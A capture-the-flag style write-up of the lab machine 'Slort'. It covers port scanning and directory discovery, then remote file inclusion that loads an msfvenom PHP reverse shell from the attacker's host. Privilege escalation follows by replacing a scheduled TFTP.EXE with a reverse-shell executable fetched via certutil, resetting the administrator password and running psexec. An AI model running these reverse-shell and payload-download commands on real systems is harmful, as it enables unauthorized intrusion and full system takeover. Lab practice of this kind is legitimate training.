# Slort

### Nmap ```bash sudo nmap 192.168.230.53 -p- -sS -sV PORT STATE SERVICE VERSION 21/tcp open ftp FileZilla ftpd 0.9.41 beta 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds? 3306/tcp open mysql? 4443/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6) 5040/tcp open unknown 7680/tcp open pando-pub? 8080/tcp open http Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6) 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open msrpc Microsoft Windows RPC ``` Both port 8080 and 4443 contain the same web directory redirecting both to the /dashboard/ directory for XAMPP.

Running `dirsearch.py` against the target reveals the /site page. ``` python3 dirsearch.py -u http://192.168.230.53:8080 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 --full-url ```

The /site/index.php page:

Paying close attention to the full address of the index.php page we can see the following: ``` http://192.168.230.53:8080/site/index.php?page=main.php ``` Looking at the part index.php?page=\ we can test for RFI to see if vulnerable. I created a test.txt file on my attacking machine and then hosted the directory with a `Python SimpleHTTPServer`. Then browsed to the following: ``` http://192.168.230.53:8080/site/index.php?page=http://192.168.49.230/test.txt ``` This confirms RFI:

As we know we are running PHP we can generate a PHP reverse shell with `msfvenom` in order to catch a reverse shell using the RFI. ``` msfvenom -p php/reverse_php LHOST=192.168.49.230 LPORT=21 -f raw > phpreverseshell.php ```

Host this in the same directory as the `Python SimpleHTTPServer` and ensure the listening port is set to 21. Then in the browser browse to the shell we just generated. ``` http://192.168.230.53:8080/site/index.php?page=http://192.168.49.230/phpreverseshell.php ```

Once we are connected we are running as the user rupert. Looking through the C:\ root directory we have a folder called backup. Looking at the contents within and reading info.txt we see that the note mentions `TFTP.EXE` is executed every 5 minutes.

I was able to delete `TFTP.EXE` which means we can replace it with a malicious shell. Knowing this we can generate a reverse shell with `msfvenom` and call it `TFTP.EXE`. ``` msfvenom -p windows/shell_reverse_tcp LHOST=192.168.49.230 LPORT=21 -f exe > TFTP.EXE ``` The shell was then uploaded with `certutil.exe`. ``` certutil.exe -f -urlcache -split http://192.168.49.230/TFTP.EXE ```

A `netcat` listener was set up on port 21 and after 5 minutes the `TFTP.EXE` was executed as part of the scheduled task and we receive an administrator shell.

As we are administrator we can then escalate to SYSTEM by fist changing the administrator password: ``` net user administrator Password123 ```

Then using `Psexec.py` to gain shell as SYSTEM. ``` sudo python2 psexec.py /administrator:Password123@192.168.230.53 ```